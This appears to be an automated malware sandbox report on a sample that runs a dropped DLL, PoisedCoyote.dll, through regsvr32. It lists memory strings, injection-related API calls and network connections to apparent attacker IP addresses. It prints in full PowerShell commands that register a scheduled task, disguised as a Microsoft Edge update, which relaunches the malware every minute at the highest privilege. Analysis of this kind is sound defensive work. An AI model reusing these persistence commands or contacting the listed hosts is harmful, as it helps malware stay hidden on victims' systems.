Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionj
Source: regsvr32.exe, 00000010.00000003.1973208647.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evi
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui
Source: regsvr32.exe, 00000010.00000003.1976588616.00000000012C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorem32#
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor7;
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipessJ
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition$
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,16_2_00007FFDFB206890
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes,16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 154.216.19.129 58001Jump to behavior
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.93.131.124 443Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\regsvr32.exeThread register set: 7688 5Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\poisedcoyote.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d7c2db06-fcf6-4992-af37-53f140cd5a88}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\poisedcoyote.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d7c2db06-fcf6-4992-af37-53f140cd5a88}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"Jump to behavior
Source: regsvr32.exe, 00000008.00000003.2088977331.000000000338C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2021256685.00000000038FA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
